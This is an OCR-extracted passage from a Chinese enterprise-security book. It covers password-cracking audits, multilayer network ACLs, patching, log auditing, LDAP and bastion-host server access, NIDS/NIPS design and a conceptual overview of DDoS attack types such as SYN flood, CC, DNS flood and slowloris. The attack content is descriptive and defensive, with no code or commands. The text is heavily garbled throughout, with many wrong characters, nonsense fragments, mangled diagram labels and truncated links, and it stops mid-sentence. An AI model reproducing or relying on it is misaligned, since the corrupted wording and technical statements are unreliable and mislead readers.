账号 密码 的 涉及 范围 非常 广 ， 包 括 OS、 数 据 库 、 中 间 件 /容器 、 所 
有 的 应 用 管理 后 侣 、 网 络 设备 、 安 全 设备 、 上 自动化 运 维 管理 后 台 、VPN 
账号 等 ， 之 所 以 在 系统 加 固 之 外 单列 出 来 是 因为 密码 骏 破 已 成 为 当下 比 
较 主要 的 渗透 方式 之 一 ， 从 来 部 没有 哪个 时 代 像 当前 这 样 热 束 于 猜 解 密 
码 。 








对 付 骏 力 破解 最 有 效 的 方式 是 多 因素 认证 或 非 密码 认证 ， 考 虑 到 可 
用 性 的 问题 ， 不 太 可 能 开启 账户 登录 失败 锁定 琐 略 ， 那 样 的 话 就 随 着 互 
联网 上 的 暴 破 直接 变 成 拒绝 服务 了 ， 所 以 在 无 法 使 用 MFA (多 因素 认 
WE) 或 证 书 认证 的 场合 ， 最 低 的 底线 的 还 是 设置 复杂 的 密码 ， 但 是 什么 
才 算 复杂 的 密码 呢 ? 这 个 定义 可 能 跟 过 去 完全 不 同 。 过 去 满足 一 定 长 度 














和 复杂 度 的 就 算是 可 以 ， 而 如 今 攻击 者 早已 站 在 大 数据 的 维度 ， 即 攻击 
者 手 上 拥有 各 种 社工 库 ， 拥 有 几 十 亿 网 名 的 常用 密码 ， 尽 管 你 可 以 设置 
一 个 看 上 去 有 一 定 复 杂 度 的 密码 ， 但 只 要 这 个 密码 在 黑客 的 “字典 ?里 ， 
在 攻击 者 的 数据 库 中 ， 那 实质 上 还 是 一 个 “ 弱 ?” 密 码 。 有 些 入 侵 事 件 的 根 
因 分 析 ， 因 为 觉得 自己 管理 员 密 码 比较 长 所 以 就 主观 排除 了 通过 口令 入 
侵 的 可 能 ， 但 是 在 其 他 点 上 又 找 不 到 原因 ， 然 后 顺 看 APT 的 方 回去 了 ， 
再 然后 就 没有 然后 了 .…... 其 实 没 想 到 束 是 “ 弱 ” 密 码 导 致 的 。 


























站 在 攻击 者 的 角度 ， 自 己 主动 破解 密码 在 当下 的 互联 网 行业 已 经 算 
不 上 是 什么 激进 的 手段 了 。 作 为 甲 方 安 全 团队 ， 平 时 也 应 该 收集 各 种 社 
工 库 ， 把 公司 内 部 研发 测试 运 维 常用 的 “ 弱 ” 密 码 做 成 字典 ， 周 期 性 地 更 
新 这 个 字典 并 主动 尝试 破解 公司 内 名 个 系统 的 账号 ， 能 破解 的 都 视 为 弱 
密码 ， 即 可 要 求 相 关 人 员 整 改 。 越 往 后 ， 一 厢 情 愿 地 站 在 防御 者 角度 做 
安全 会 越 来 越 难 做 ， 防 御 者 必须 跟随 攻击 者 的 脚步 ， 避 免 被 “领先 一 个 
时 代 ”。 





6.2.5 ”网络 访问 控制 


安全 域 和 访问 控制 的 区 别 在 于 ， 安 全 域 是 更 加 高 层次 的 圈 地 运动 ， 
而 NACL 相 对 更 具体 化 ， 针 对 的 是 每 一 个 系统 ， 安 全 域 相对 固化 ， 基 本 
不 会 变动 ， 而 NACL 则 会 应 需 而 变 。 


有 人 说 防火 墙 这 种 东西 会 淘汰 ， 我 觉得 这 种 观点 跟 “ 计 算 机 终 完 会 
消亡 ”是 一 样 的， 没什么 意义 。 防 火 增 在 安全 管理 的 拉 术 手段 里 占 的 整 
体 比 重 是 越 来 越 小 ， 但 不 代表 它 没 有 价值 或 彻 撒 淘汰 ， 实 际 上 防火 墙 在 
NACL 领 域 里 扮演 者 无 可 蔡 代 的 作用 。 


在 大 型 互联 网 里 ， 购 买 商业 防火 墙 产 品 可 能 会 越 来 越 少 ， 大 部 分 都 
会 转 为 使 用 Netfilter+ 高 性 能 PC 服务 器 。 当 然 ， 也 有 用 得 到 商业 产品 的 时 
候 ， 例 如 在 DC 的 出 口 可 能 会 部 署 高 性 能 的 硬件 防火 墙 ， 这 个 防火 墙 实 
际 并 不 充当 传统 意义 上 访问 控制 网 关 的 作用 。 而 是 很 多 时 候 需 要 在 总 出 
口 部 署 几 条 类 似 于 “ 黑 名 单 * 的 总 体 策略 ( 几 条 策略 几 十 万 元 ， 一 条 策略 
万 元 是 不 是 有 点 小 奢侈 ) ， 例 如 公有 云 环 境 ， 租 户 的 业务 需要 开放 哪 
些 端口 是 不 确定 的 ， 不 能 蔡 他 做 主 一 刃 切 ， 这 个 策略 有 可 能 是 临时 的 ， 
也 可 能 是 持久 的 ， 但 在 核心 交换 机 上 做 太 多 NACL 不 合适 ， 于 是 把 
NACL 还 是 单 拆 出 来 ， 串 联 一 个 硬件 防火 墙 ， 在 防火 墙 上 做 具体 的 
NACL。 如 果 防 火 墙 后 的 业务 是 确定 开放 某 几 个 端口 ， 则 防火 墙 可 以 过 
滤 所 有 的 不 必要 端口 充当 起 访问 控制 网 关 的 作用 。 








除了 网 关 级 的 访问 控制 以 外 ， 还 有 机 柜 级 的 NACL 和 系统 级 的 
NACL， 机 柜 的 上 联 交 换 机 可 以 做 一 些 简单 的 NACL， 其 细 粒 度 以 不 影 
响 正 常 的 运 维 便利 为 准 。 


系统 级 的 NACL 用 OS 目 带 的 防火 墙 就 完全 够 用 了 ， 只 开放 服务 端口 
和 管理 端口 ， 个 别 高 等 级 安全 域 的 机 器 可 以 对 源 进 行 更 细 粒 上 度 的 限制 ， 





对 于 数据 库 应 限制 只 允许 应 用 服务 器 耻 连 接 3306、1433 等 端口 。 


生产 网 络 多 层 NACL 架 构 如 图 6-7 所 示 ， 采 用 多 层 NACL 的 原因 在 
于 ， 一 方面 安全 域 之 间 需 要 隔离 ， 安 全 域内 部 也 需要 划分 ， 另 一 方面 当 
某 一 层 的 NACL 失 效 时 ， 还 有 其 他 层 的 NACL 在 抵挡 ， 不 会 马上 变 成 “ 裸 
奔 " 模 式 。 实 际 上 ， 某 一 NACL 失 效 可 能 是 一 件 很 容易 磁 到 的 事情 ， 因 为 
某 些 网 络 变更 ， 或 者 因为 调试 ， 人 为 地 申请 了 临时 策略 ， 或 临时 取消 防 
火 墙 策略 ， 完 事后 又 筷 了 “ 回 滚 ”， 甚 至 连 审批 策略 的 人 自己 都 筷 了 这 事 
了 。 不 太 严 重 的 情况 下 ， 由 于 其 露 了 攻击 面 ， 入 侵 检测 的 告警 数量 会 因 
网 络 蠕虫 和 自动 化 攻击 工具 的 行为 急剧 增多 ， 严 重 一 点 ， 被 盯梢 的 情况 
下 ， 可 能 就 被 渗透 了 。 




















第 1 层 NACL: FW 


/第 2 层 NACL: 交换 机 


/第 3 层 NACL: 服务 器 





图 6-7 ”生产 网 络 多 层 NACL 架 构 


在 海量 IDC 追 求 弹 性 运 维 的 架构 中 ， 可 能 NACL 无 法 实施 到 理想 状 
态 ， 这 就 要 求 在 两 个 方面 做 补偿 : 








1) 资产 权重 划分 到 位 ， 对 最 高 安全 优先 级 的 网 络 追 求 多 维和 细 粒 
度 NACL， 余 下 的 可 适当 放松 。 


2) 单 点 实 现 较 强 的 入 侵 检 测 和 降 维 防御 能 力 。 


超大 规模 IDC 下 的 安全 域 和 NACL 是 一 个 比较 有 挑战 的 话题 ， 尤 其 
是 对 于 快速 成 长 的 业务 ， 其 IDC 资 产 往往 都 是 分 散 的 ， 甚 至 数据 库 都 不 








在 一 块 儿 ， 如 何在 这 种 状态 下 做 网 络 访问 的 风险 隔离 是 进入 “最 佳 实践 
阶段 ?会 面临 的 问题 ， 这 部 分 后 续 会 在 笔者 的 技术 博客 中 做 专题 分 析 。 


6.2.6 ”补丁 管理 


打 补 丁 似乎 应 该 算是 安全 日 党 工作 中 最 基础 的 项 目 了 ， 不 过 在 互联 
网 行业 里 ， 这 项 工作 已 经 跟 安全 的 相关 性 不 是 特别 大 ， 而 是 越 来 越 多 的 
体现 运 维 的 能 力 : 


:自动 化 运 维 : 如 何 大 批量 地 push 补 丁 。 





:TTSM 成 熟 度 : 打 补 丁 尽 可 能 不 影响 在 线 服务 的 可 用 性 。 


架构 容 灾 能 力 : 文 持 有 损 服务 ， 灰 度 和 深 动 升级 ， 好 的 架构 应 该 
文 持 比如 让 逻辑 层 的 茶 些 功能 服务 器 下 线 ， 接 入 层 把 流量 负载 均衡 到 其 
他 服务 器 ， 打 完 补 本 后 再 切 回 来 。 


系统 能 力 : 提供 热 补丁 ， 不 需要 重 司 。 





快速 单个 漏洞 扫描 : 补丁 push 升 级 成 功 的 检测 。 





安全 团队 需要 考虑 的 是 评 佑 漏洞 的 危害 和 对 目 有 系统 的 影响 ， 这 点 
依赖 于 很 多 能 力 ， 包 括 : 1) 资产 管理 和 配置 管理 ，2) 海量 IDC 下 的 系 
统 层 和 应 用 层 漏洞 判定 ， 需 要 用 到 很 多 维度 的 数据 ， 比 较 严 重 的 可 能 区 


要 加 班 加 点 了 ， 不 那么 严重 的 可 以 合并 到 下 一 次 运 维 时 间 窗 口 实施 ， 没 
有 实际 攻击 面 和 利用 可 能 性 的 可 以 直接 忽略 。 


6.2.7 ”日志 审计 





日 志 成 千 上 万 ， 一 开始 就 想 建 SOC 的 往往 都 是 没有 经 验 的 人 。 看 的 
PPTZ f, W) 商 介绍 多 了 ， 目 己 也 想 弄 一 个 SOC， 其 实 一 开始 是 完 
没有 必要 的 ， 这 个 时 候 建 SOC 只 会 成 为 一 个 摆设 。 基 础 的 数据 源 和 告警 
的 误 报 都 没 解决 的 时 候 ， 纵 深 防 御 体 系 还 完全 没 弄 起 来 ， 也 惑 是 生态 链 
的 底层 地 基 都 未 建 好 ， 就 直接 想 去 建 金字 塔 项 ， 那 是 理论 派 才 做 的 事 


情 。 





6.3 ”服务 器 4A 


4A 指 : 账户 (Account) 、 认 证 (Authentication) 、 授 权 
(Authorization) 、 审 计 CAudit) 。 对 于 较 大 规模 的 服务 器 集群 ， 不 太 
可 能 使 用 每 台 服 务 占 单独 维护 用 户 名 密码 (或 是 证 书 ) 的 权限 管理 方 
式 ， 而 必须 使 用 类 似 于 SSO 的 统一 权限 管理 。 目 前 主要 有 两 种 方式 : 一 
种 是 基于 LDAP 的 方案 ， 男 一 种 是 基于 堡垒 机 的 方案 。 








1. 基 于 LDAP 


基于 LDAP 的 服务 器 SSO 架 构 如 图 6-8 所 示 。 








Linux(PAM) Windows(pGina) 


LDAP(SSO) 








图 6-8 基于 LDAP 的 服务 器 SSO 架 构 


LDAP 的 方案 可 以 使 用 LDAP 服 务 器 作为 登录 的 SSO， 统 一 托管 所 有 
的 服务 器 账号 ， 在 服务 器 端 对 于 Linux 系 统 只 要 修改 PAM (Pluggable 
Authentication Modules? ) ，Windows 平 台 则 推荐 pGina (pGina 是 一 个 


开源 插件 ， 作 为 原 系统 凭证 提供 者 GINA 的 着 代 品 ， 实 现 用 户 认 证 和 访 


问 管理 ) ， 使 登录 认证 重 定 同 到 LDAP 服 务 器 做 统一 认证 。 
2. 基 于 堡垒 机 


基于 堡 侄 主机 的 方式 如 图 6-9 所 示 。 


在 Radius 上 新 建 用 户 Richard， 为 该 用 户 生 成 SSH 的 公私 钥 对 ， 使 用 
自动 化 运 维 工具 将 公 钥 分 发 到 该 用 户 拥 有 对 应 权限 的 服务 器 上 。 用 户 的 
SSH 连 接 由 堡垒 机 托管 ， 登 录 时 到 Radius 服 务 器 使 用 动态 令 牌 认证 身 
份 ， 认 证 成 功 后 授权 访问 其 私 铀 ， 则 对 于 有 SSH 公 钥 的 服务 器 该 用 户 都 
可 以 登录 。 网 络 访问 控制 上 应 设置 服务 器 SSHD 服 务 的 访问 源 地 址 为 保 
ZAHLETIP « 











N; 
Richard 的 SSH 、、 Richard 的 SSH 


: 
\ / Richard 的 SSH 
~ 
公 钥 @server-11 、 ISB @server-2 / 
pd 公 钥 LU ; Fi AN @server-3 
/ 


Richard 的 SSH 
私 钥 @ 堡垒 机 







验证 richard 
授权 访问 其 
SSH 私 钥 


Radius 认证 





Richard 


图 6-9 ”基于 堡垒 机 的 服务 器 SSO 架 构 


第 7 章 ”网 络 安全 


网 络 安 全 古 传 统 安全 解决 方案 里 关注 最 多 的 部 分 ， 在 应 用 安全 凸显 
以 前 的 时 代 ， 网 络 安全 几乎 束 是 解决 方案 的 “主体 ”了 。 本 章 将 介绍 网 络 
入 侵 检 测 的 基本 方案 、I 级 DDoS 防御 策略 、 链 路 劫持 的 应 对 措施 、 应 用 
防火 场 建设 策略 等 。 


7.1 网 络 入 侵 检测 


1. 传 统 NIDS 


随 着 APT 一 词 的 兴起 ， 有 些 人 认为 IDS《〈 入 侵 检测 系统 ) 要 消亡 
了 ， 不 过 笔者 认为 APT 的 解决 方案 目前 更 多 的 还 是 在 办 公 网 络 ， 对 生产 
网 络 而 言 NIDS《〈 网 络 入 侵 检测 系统 ) 不 会 消亡 ，HIDS (主机 入 侵 检 测 
系统 ) 会 大 放 光 彩 。 顶 多 只 能 说 NIDS 的 产品 形态 正在 发 生 改变 ， 但 
APT 检 测 无 法 取代 NIDS。 








图 7-1 是 绿 盟 的 NIDS 产 品 架 构 ， 图 7-2 是 NIPS 的 产品 架构 ， 区 别 就 是 
D 和 P， 前 者 只 检测 ， 后 者 除了 检测 还 会 多 一 个 P 的 功能 ， 即 匹配 规则 后 
最 末 追 加 一 个 动作 : 丢 包 或 放行 。 对 于 大 多 数 人 而 言 ， 无 论 是 NIDS 还 
是 NIPS 都 只 是 一 个 硬件 盒子 ， 很 多 人 并 不 关心 它 的 具体 实现 。 最 直观 的 
就 是 部 署 ， 如 图 7-3 所 示 。 





绿 盟 科技 升 能 站 点 


网 络 探测 器 





图 7-1 绿 盟 科技 IDS 体 系 架构 


下 一 代 调 整 引 擎 





图 7-2” 绿 盟 科 技 IPS 体 系 架构 
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图 7-3”IDS/IPS 部 署 示 意图 








比较 典型 的 场景 是 在 出 口 处 部 署 NIDS， 做 统一 流量 监控 ， 或 者 在 
此 处 部 署 NIPS。 在 这 个 位 置 部 署 NIPS 相 对 于 NIDS 的 好 处 并 非 真正 意义 
上 执行 全 流量 P 的 功能 ， 而 在 于 当 诸 如 shellshock 等 漏洞 公布 时 ， 可 以 在 
这 里 定制 临时 过 滤 规划， 只 对 这 几 条 临时 规则 实施 串联 的 防护 ， 从 而 达 
到 “虚拟 补丁” 的 功能 








对 于 重要 安全 域 的 服务 器 内 网 ， 可 以 选择 性 地 部 普 NIDS， 对 关键 
区 域 做 更 深层 次 的 关注 。 





有 人 说 传统 的 NIDS 已 经 没有 价值 ， 其 实 不 然 。 虽 然 对 于 大 型 互联 
网 公司 来 说 ， 传 统 NIDS 捉 襟 见 肘 ， 但 是 目前 大 型 网 络 的 IDS 除 了 自 研 之 


外 没有 第 二 条 路 可 选 ， 即 便 选 择 自 研 ， 在 获得 第 一 个 版 本 之 前 要 么 选择 
没有 ， 要 么 就 是 用 传统 NIDS。 如 果 不 差 钱 ， 购 买 商业 NIDS、NIPS 用 做 
阶段 性 过 度 也 是 不 错 之 选 。 对 于 流量 不 是 特别 大 的 情况 ， 其 实 自 研 本 身 
的 ROI 是 不 确定 的 ， 商 业 产 品 免 去 了 自 研 交付 的 风险 和 持续 维护 的 成 
本 。 另 外 在 办 公 网 络 里 ， 商 业 NIDS 和 NIPS 完 全 适用 。 在 具体 选 型 上 对 
于 不 差 钱 的 公司 可 以 直接 参考 Gartner MQ 象 限 排名 。 


2. 开 源 SNORT 


对 于 要 求 不 高 、 有 了 时间 与 精力 、 爱 折腾 、 不 想 花 钱 买 商业 产品 又 不 
打算 去 自 研 的 人 来 说 ， 开 源 的 SNORT 是 一 个 选择 : https:/www.snort.org 


3. 大 型 全 流量 NIDS 


特征 


« DED » 


图 7-4 NIDS 原 理 图 


当 互 联网 公司 的 业务 成 长 速度 比较 快 时 ， 其 IDC 网 络 流量 也 很 可 能 
会 超过 单 台 NIDS 的 最 大 处 理 能 力 (40~80Gbps) ， 虽 然 产 品 声称 的 吞吐 


能 力 比 较 高 ， 由 于 NIDS 的 架构 问题 〈 如 图 7-4 所 示 ) ， 采 用 的 是 基于 攻 
击 特 征 的 签名 库 ， 只 要 加 载 的 攻击 特征 一 多 ， 系 统 负载 马上 会 飙升 ， 远 
到 不 了 系统 的 标 称 负载 就 会 开始 出 现 丢 包 和 误 报 率 的 上 升 。 传 统 NIDS 
在 大 型 互联 网 场景 下 有 如 下 几 个 明显 的 缺陷 : 











.IDC 规 模 稍 大 很 容易 超过 商业 NIDS 处 理 带宽 的 上 限 ， 虽 然 可 以 多 
级 部 区 ， 但 无 法 像 互联 网 架构 一 样 做 到 无 颖 的 水 平 扩展 ， 不 能 跟 基础 染 
构 一 起 扩展 的 安全 解决 方案 最 终 部 会 掌 肘 。 


-硬件 盒子 单 点 的 计算 和 存储 能 力 有 限 ， 很 容易 在 CPU 时 间 和 存储 
空间 上 达到 硬件 盒子 的 上 限 ， 即 使 有 管理 中 心 可 以 腾挪 存储 空间 也 解决 
不 了 这 个 问题 。 


规则 数量 是 性 能 杀手 ， 最 不 能 被 并 行 处 理 的 部 分 会 成 为 整个 架构 
的 瓶颈 。 


.升级 和 变更 成 本 高 ， 可 能 对 业务 产生 影响 。 





.IDC 规 模 较 大 时 ， 部 署 多 人 台 最 高 规格 商业 NIDS 的 TCO 很 高 
Google 如 果 用 IBM 的 解决 方案 会 破产 ) 。 





对 于 述 述 不 愿意 自 研 的 人 ， 有 人 想到 了 过 渡 性 方 采 ， 如 图 7-5 所 
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17-5 NIDS 硬 件 扩展 方案 


这 样 看 上 去 比 厂 丙 提 供 的 多 层级 联 的 方案 稍微 好 一 点 ， 貌 似 解决 了 
水 平 扩 展 问 题 ， 但 是 它 仍然 没有 解决 TCO 的 问题 ， 无 论 如 何 这 种 方案 都 
不 适合 拿 到 台面 上 来 作为 最 佳 实践 ， 它 只 能 用 于 暂时 换取 自 研 NIDS 的 
时 间 。 


为 解决 以 上 提 到 的 几 个 痛 点 ， 针 对 大 规模 的 IDC 网 络 ， 把 整个 架构 
改良 了 一 下 (如 图 7-6 所 示 ) 。 
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图 7-6 ”基于 大 数据 的 NIDS 架 构 





-分 层 结构 ， 所 有 节点 全 线 文 持 水 平 扩展 。 





-检测 与 防护 分 离 ， 性 能 及 可 用 性 大 幅 提 升 ， 按 需 决 定 防护 ， 支 持 
灰 度 。 


报 文 解析 与 攻击 识别 完全 解 厢 ， 入 侵 检 测 环 市 “后 移 ”。 





依赖 大 数据 集群 ， 规 则 数量 不 再 成 为 系统 瓶颈 ， 并 且 不 再 局 限于 


基于 静态 特征 的 规则 集 ， 而 古 能 多 维度 建 模 。 
“加 规则 ?完全 不 影响 业务 。 


这 是 全 流量 全 协议 全 功能 版 本 ， 你 也 可 以 只 取 其 中 一 部 分 ， 比 如 对 
于 以 HTTP/HTTPS 为 主 的 web 平台 可 以 只 关注 HTTP 类 协议 。 


4. 天 于 DD 还 是 P 


对 于 单纯 的 检测 来 说 ， 过 分 的 实时 性 要 求 其 实意 义 不 是 特别 大 ， 攻 
击 行为 发 生 后 10 秒 钟 告警 和 10 分 钟 告警 效果 都 差不多 ， 慢 一 点 也 不 会 误 
事 。 按 正常 人 的 节奏 ， 半 小 时 顶 多 也 就 是 从 普通 权限 提 到 了 root， 而 且 
不 太 可 能 因为 秒 级 的 机 器 告警 就 会 有 秒 级 的 人 肉 应 急 处 理 速度 ，1 个 小 
时 内 反应 都 算 快 的 了 。 因 为 可 以 延 时 处 理 ， 所 以 D (detection) 方案 的 
门槛 比 P〈protection ) 方案 要 低 。 











对 互联 网 服务 而 言 ， 可 用 性 是 除了 数据 丢失 以 外 的 第 二 大 严重 问 
题 ， 如 果 要 实现 P 就 会 面临 延迟 和 误杀 的 风险 ， 因 此 了 方案 实际 比 D 方 案 
难 了 一 个 阶梯 。 在 海量 IDC 环 境 中 ， 想 要 做 到 全 线 业务 实时 防护 基本 有 是 
不 可 能 的 ， 但 又 确实 有 这 样 的 需求 ， 比 如 shellshock 这 样 的 漏洞 可 能 要 
修一 个 礼拜 ， 在 这 期 间 网 上 早 有 POC， 那 些 有 漏洞 暴露 在 外 的 机 器 怎么 
办 ， 你 既 不 能 让 它 下 线 又 不 能 任 它 被 黑 ， 那 就 需要 在 前 并 有 一 层 虚 拟 补 
丁 ， 把 利用 这 个 漏洞 的 攻击 行为 有 针对 性 的 过 涯 一 下 ， 为 修 漏洞 恬 得 时 








间 窗 口 。 所 以 方案 最 终 是 一 个 打折 扣 的 版 本 ， 利 用 DDoS 引流 -清洗 
(过 滤 ) - 回 注 的 防护 原理 ， 将 需要 防护 的 流量 迁移 到 清洗 集群 ， 清 洗 
集群 上 的 过 滤 规 则 绝对 不 会 是 商业 NIPS 广 告 宣称 的 那 种 大 而 全 的 ， 而 是 
有 针对 性 的 几 条 高 危 漏 洞 规 则 ， 做 一 层 很 轻 的 过 滤 。 可 以 文 持 灰 度 是 因 
为 能 决定 牵引 哪些 目标 地 址 的 流量 ， 而 剩余 的 选择 维持 原 路 由 ， 这 样 能 
做 到 对 业务 的 影响 降 至 最 低 ， 尽 可 能 做 到 对 用 户 是 一 种 无 感知 状态 。 
在 “和 平时 期 *"， 一 般 不 需要 启用 P 功 能 ， 只 使 用 D 就 可 以 。 


5. 对 厂商 的 建议 








互联 网 公司 选择 自 研 有 时 是 出 于 无 条 ， 而 非 为 了 自我 标榜 。 如 果 安 
全 公司 的 NIDS，NIPS 能 解决 扩展 性 的 问题 ， 那 对 甲 方 安全 团队 来 说 真 
的 没 必要 再 去 搞 一 套 。 但 是 这 里 面 的 诉求 是 分 级 和 差异 化 的 ， 有 的 客户 
需要 的 是 傻瓜 的 一 站 式 解 决 方案 ， 而 互联 网 公司 ， 尤 其 是 大 一 点 的 都 有 
自己 的 安全 团队 ， 有 安全 团队 就 爱 “ 折 腾 ”"， 更 加 需要 的 是 一 个 开放 式 的 
平台 ， 而 不 是 一 个 完全 封闭 的 硬件 盒子 ， 过 去 厂商 卖 的 产品 苋 争 力 是 基 
于 攻击 特征 的 规则 库 ， 但 现在 安全 团队 往往 能 自己 建 规则 ， 不 完全 依赖 
于 厂商 提供 的 已 有 规则 集 ， 他 们 根据 自己 的 业务 往往 能 制定 出 更 加 有 效 
的 规则 ， 但 是 他 们 需要 一 个 平台 ， 这 个 平台 可 以 解决 包括 大 流量 ， 高 性 
能 的 抓 包 和 解 包 问 题 ， 能 有 渠道 自 定义 规则 ， 包 括 packet 头 部 各 字段 以 
及 payload 可 以 全 部 自 定义 ， 最 好 能 有 一 种 简单 的 类 脚本 语言 支持 ， 这 样 
安全 团队 能 专注 于 自己 的 核心 业务 ， 而 不 用 变 成 安全 产品 研发 团队 。 



































参考 资料 


绿 盟 网 络 入 侵 检 测 系 
: http://www.nsfocus.com.cn/upload/contents/2015/04/201504031403060. 


绿 盟 网 络 入 侵 防护 系 
: http://www.nsfocus.com.cn/upload/contents/2015/04/201504031405340. 


7.2 TIT 级 DDoS 防御 


7.2.1 DDoS 分 类 


在 讲 防御 之 前 ， 先 简单 介绍 一 下 各 类 攻击 ， 因 为 DDoS 不 是 一 种 攻 
击 ， 而 是 很 多 种 类 的 攻击 ， 并 且 DDoS 的 防御 可 以 做 到 相对 自动 化 但 做 
不 到 绝对 自动 化 ， 很 多 演进 的 攻击 方式 自动 化 工具 不 一 定 能 识别 ， 还 需 
要 专家 进一步 用 肉眼 判断 。 








1. 网 络 层 攻 击 








利用 TCP 建 并 连接 时 3 次 握手 的 “漏洞 "， 通 过 原始 套 
接 字 发 送 源 地 址 虚假 的 SYN 报 文 ， 使 目标 主机 永远 无 法 完成 3 次 握手 ， 
占 满 了 系统 的 协议 栈 队列 ， 资 源 得 不 到 释放 ， 进 而 拒绝 服务 ， 是 互联 网 
中 最 主要 的 DDoS 攻击 形式 之 一 。 网 上 有 一 些 加 固 的 方法 ， 例 如 调整 内 
核 参数 的 方法 ， 可 以 减少 等 待 及 重 试 ， 加 速 资 源 释放 ， 在 小 流量 syn- 
flood 的 情况 下 可 以 缓解 ， 但 流量 稍 大 时 完全 不 抵 用 。 防 御 syn-flood 的 常 
见方 法 有 : syn proxy, syn cookies、 首 包 《【 第 一 次 请 求 的 syn 包 ) EF 


7 
等 。 


‘Syn-flood 





近年 攻击 者 开始 采用 1000 字 节 的 SYN 包 进行 攻击 ， 试 图 在 消耗 CPU 
资源 的 同时 ， 堵 塞 边缘 带宽 ， 攻 击 流量 相 比 标准 SYN 包 大 大 增加 ， 目 前 


己 观察 到 的 最 大 的 SYN 攻 击 可 达 680Gbps， 这 使 得 防御 也 更 加 困难 。 带 
payload 的 syn 包 在 不 需要 TFO (TCP Fast Open) 的 地 方 可 以 直接 丢弃 ， 





前 提 是 有 ADS 设 备 。 


:ACK-flood 一 一 对 于 虚假 的 ACK 包 ， 目 标 设备 会 直接 回复 RST 包 于 
弃 连 接 ， 所 以 伤害 值 远 不 如 syn-flood。DDoS 的 一 种 原始 方式 。 














.UDP-flood- 一 使 用 原始 套 接 字 伪造 大 量 虚 假 源 地 址 的 UDP 包 ， 目 
前 以 DNS 协议 为 主 。 

:ICMP-flood 一 一 Ping 洪 水 ， 是 一 种 比较 古老 的 方式 。 
2. 应 用 层 攻 击 


-CC 一 一 ChallengeCollapsar 的 名 字源 于 挑战 国内 知名 安全 厂商 绿 盟 
的 抗 DDoS 设备 -“ 黑 洞 ”， 通 过 botnet 的 倪 偶 主机 或 寻找 匿名 代理 服务 
器 ， 向 目标 发 起 大 量 真 实 的 http 请 求 ， 最 终 消 耗 掉 大 量 的 并 发 资源 ， 拖 
慢 整个 网 站 甚至 彻底 拒绝 服务 。 











互联 网 的 架构 追求 扩展 性 本 质 上 是 为 了 提高 并 发 能 力 ， 各 种 SQL 性 
能 优化 措施 : 消除 慢 碍 询 、 分 表 分 库 、 索 引 、 优 化 数据 结构 、 限 制 搜索 
频率 等 本 质 都 是 为 了 解决 资源 消耗 ， 而 CC 大 有 反 其 道 而 行 之 的 意味 ， 
占 满 服务 器 并 发 连接 数 ， 尽 可 能 使 请 求 避 开 绥 存 而 直接 读数 据 库 ， 读 数 
据 库 要 找 最 消耗 资源 的 查询 ， 最 好 无 法 利用 索引 ， 每 个 查询 都 全 表 扫 











描 ， 这 样 束 能 用 最 小 的 攻击 资源 起 到 最 大 的 拒绝 服务 效果 。 


互联 网 产品 和 服务 依靠 数据 分 析 来 驱动 改进 和 持续 运营 ， 所 以 除了 
前 端的 APP、 中 间 件 和 数据 库 这 类 OLTP 系 统 ， 后 面 还 有 OLAP， 从 日 志 
收集 ， 存 储 到 数据 处 理 和 分 析 的 大 数据 平台 ， 当 CC 攻击 发 生 时 ， 不 仅 
OLTP 的 部 分 受到 了 影响 ， 实 际 上 CC 会 产生 大 量 日 志 ， 直 接 会 对 后 面 的 
OLAP 产 生 影响 ， 影 响 包括 两 个 层面 ， 一 个 当日 的 数据 统计 完全 是 错误 
的 。 第 二 个 层面 因 CC 期 间 访 问 日 志 剧 增 也 会 加 大 后 端 数据 处 理 的 负 
担 。 














目前 应 用 层 攻击 的 主要 手段 之 一 ， 在 防御 上 有 一 些 方法 ， 但 
不 能 完美 解决 这 个 问题 。 





‘DNS flood 一 一 伪造 源 地 址 的 海量 DNS 请 求 ， 用 于 淹没 目标 的 DNS 
服务 器 。 对 于 攻击 特定 企业 权威 DNS 的 场景 ， 可 以 将 源 地 址 设置 为 各 大 
ISP DNS 服 务 占 的 ip 地 址 以 突破 日 名 单 限制 ， 将 查询 的 内 容 改 为 针对 日 
标 企 业 的 域名 做 随机 化 处 理 ， 当 查询 无 法 命中 缓存 时 ， 服 务 器 负载 会 进 


一 步 增 大 。 





DNS 不 只 在 UDP-53 提 供 服 务 ， 同 样 在 TCP 协 议 提供 服务 ， 所 以 防御 
的 一 种 思路 就 是 将 UDP 的 查询 强制 转 为 TCP， 要 求 济源， 如果 是 假 的 源 
地 址 ， 就 不 再 回应 。 对 于 企业 自 有 权威 DNS 服务 器 而 言 ， 正 常 请 求 多 来 
目 于 ISP 的 域名 递归 解析 ， 所 以 将 日 名 单 设置 为 ISP 的 DNS server 列 表 。 


对 于 源 地 址 伪造 成 ISP DNS 的 请 求 ， 可 以 通过 TTL 值 进一步 判断 。 





慢 速 连接 攻击 一 一 针对 HTTP 协 议 ， 以 知名 的 slowloris 攻 击 为 起 
源 : 先 建 YHTTP 连 接 ， 设 置 一 个 较 大 的 content-length， 每 次 只 发 送 很 
少 的 字 节 ， 让 服务 器 一 直 以 为 HITP 头 部 没有 传输 完成 ， 这 样 的 连接 一 
BART ZS h LER ATER 





目前 出 现 了 一 些 变种 ，HTTP 慢 速 的 post 请 求 和 慢 速 的 read 请 求 都 是 
基于 相同 的 原理 。 





:DOS 攻 击 一 一 有 些 服务 需 程 序 存在 pug、 安 全 漏洞 ， 或 丸 构 性 缺 
陷 ， 攻 击 者 可 以 通过 构造 的 畸形 请 求 发 送 给 服务 器 ， 服 务 顺 因 不 能 正确 
处 理 亚 意 请 求 而 陷入 僵 死 状态 ， 导 致 拒绝 服务 。 例 如 某 些 版 本 的 应 用 服 
务 吉 程序 存在 缓冲 区 游 出， 漏洞 可 以 触发 但 无 法 得 到 shell， 攻 击 者 可 以 
改变 程序 执行 流程 使 其 跳 转 到 空 指针 或 无 法 处 理 的 地 址 ， 用 户 态 的 错误 
会 导致 进程 挂 起 ， 如 末 错 误 不 能 被 内 核 回收 则 可 能 使 系统 当 挥 。 











这 类 问题 效果 也 表现 为 拒绝 服务 ， 但 本 质 上 属于 漏洞 ， 可 以 通过 
patch 程 序 的 最 新 版 本 解决 ， 笔 者 认为 不 属于 DDoS 的 范畴 。 


3. 攻 击 方式 


混合 型 攻击 一 一 在 实际 大 流量 的 攻击 中 ， 通 党 并 不 是 以 上 述 一 种 
数据 类 型 来 攻击 ， 往 往 是 混杂 了 TCP 和 UDP 流量 ， 网 络 层 和 应 用 层 攻 击 


同时 进行 。 


反射 型 攻击 一 一 2004 年 时 反射 型 攻击 CDRDOS) 第 一 次 披露 ， 通 
